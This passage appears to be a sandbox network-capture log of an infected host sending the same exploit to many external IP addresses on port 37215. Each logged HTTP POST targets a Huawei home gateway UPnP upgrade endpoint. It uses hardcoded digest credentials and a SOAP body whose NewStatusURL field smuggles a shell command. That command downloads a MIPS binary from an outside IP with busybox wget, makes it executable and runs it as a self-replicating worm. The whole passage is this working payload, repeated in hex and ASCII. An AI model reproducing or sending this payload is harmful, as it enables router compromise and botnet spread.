                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2232192.168.2.235366041.227.223.22637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.663990974 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2233192.168.2.235223642.68.94.15837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.664082050 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2234192.168.2.234141841.51.72.21637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.664083958 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2235192.168.2.2336604197.49.251.13637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.664103031 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2236192.168.2.233846657.250.31.19237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.664118052 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2237192.168.2.2350730197.15.9.9037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.664127111 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2238192.168.2.2347884157.116.249.9037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.664300919 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2239192.168.2.2338540210.232.68.7637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.664300919 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2240192.168.2.2344260197.75.211.20237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.664314985 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2241192.168.2.234913041.47.22.837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.664446115 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
